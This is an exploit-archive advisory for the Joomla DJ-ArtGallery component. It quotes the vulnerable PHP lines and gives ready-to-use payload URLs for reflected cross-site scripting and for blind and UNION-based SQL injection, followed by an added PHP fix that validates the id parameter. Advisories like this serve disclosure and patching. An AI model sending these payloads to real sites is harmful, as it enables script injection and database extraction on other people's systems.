
Joomla Component com_djartgallery Multiple Vulnerabilities

Posted on 04 June 2010

==========================================================
Joomla Component com_djartgallery Multiple Vulnerabilities
==========================================================

#Exploit Title: Joomla Component com_djartgallery Multiple Vulnerabilities
#Date: 04/06/2010
#Author: Tomasz Kowalski
#Software Link: http://www.design-joomla.eu/downloads/download/components/dj-artgallery.html
#Version: 0.9.1
#Tested on: Linux ubuntu32 2.6.32-22-generic x64

#Summary:

[+] Cross Site Scripting in administrator/components/com_djartgallery/views/editimage/tmpl/default.php

We can find this code at line 183:

...
<input type="hidden" name="id" value="<?php echo JRequest::getVar('id'); ?>" />
<input type="hidden" name="option" value="com_djartgallery" />
<input type="hidden" name="task" value="editImage" />
...

You must see it }x)

<input type="hidden" name="id" value="<?php echo JRequest::getVar('id'); ?>" />

The id value is echoed into the page without any encoding, so one way to exploit this is the following code injection:

http://localhost/joomla/administrator/index.php?option=com_djartgallery&task=editItem&cid[]=%22%3E%3C/form%3E%3CSCRIPT%3Ealert%28%22XSS%20by%20r0i%22%29;%3C/script%3E

[+] Blind SQL Injection

We can also extract database information through blind SQL injection on the same parameter, as the following code shows.

administrator/components/com_djartgallery/controller.php, line 382:

$link = 'index.php?option=com_djartgallery&task=com_djartgallery&task=editItem&cid[]='.JRequest::getVar('id');

To exploit it:

http://victim/administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+

The 'Select Article' field changes depending on whether the injected condition is true or false; a UNION-based injection is also likely to work:

http://victim/administrator/index.php?option=com_djartgallery&task=editItem&cid[]=-1%27/*!UNION%20SELECT%20@@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25*/+--+

# Inj3ct0r.com [2010-06-04]
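A hardened version of the two vulnerable lines above, added here as an example (it is not part of the advisory or of the DJ-ArtGallery component). It assumes plain PHP outside the Joomla runtime; inside the component the equivalent of the helper is JRequest::getInt('id') in place of JRequest::getVar('id'), and the model query that consumes cid[] should cast the values the same way.

```php
<?php
// Added example, not code from the advisory or the component: the `id`
// parameter is validated once and both sinks (hidden input and link) use
// only the validated integer. Assumes plain PHP with no Joomla runtime.
declare(strict_types=1);

/** Return the request id as a non-negative integer, or null if it is not purely numeric. */
function safeImageId(array $request): ?int
{
    $raw = $request['id'] ?? null;
    // Only digits are accepted, so quotes, tags and SQL fragments never reach
    // the template or a query; this is the fix for both findings at once.
    if (!is_string($raw) || !preg_match('/^\d{1,10}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

/** Replacement for the hidden input at default.php line 183. */
function renderHiddenIdInput(array $request): string
{
    $id = safeImageId($request);
    if ($id === null) {
        // No raw echo on bad input: the field is simply left empty.
        return '<input type="hidden" name="id" value="" />';
    }
    // Output encoding is kept as defence in depth even though $id is an int.
    $escaped = htmlspecialchars((string) $id, ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="id" value="' . $escaped . '" />';
}

/** Replacement for the link built in controller.php line 382 (the duplicated task= is dropped here). */
function buildEditItemLink(array $request): ?string
{
    $id = safeImageId($request);
    return $id === null ? null : 'index.php?option=com_djartgallery&task=editItem&cid[]=' . $id;
}

// Constructed sample inputs: one legitimate id and one carrying a quote and a tag.
foreach (['5', '5"><b>x'] as $sample) {
    echo renderHiddenIdInput(['id' => $sample]), PHP_EOL;
    var_dump(buildEditItemLink(['id' => $sample]));
}
```

Run with `php example.php`: the first input yields a numeric hidden field and link, the second yields an empty field and a null link, so nothing attacker-controlled is written into the page or the cid[] value.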
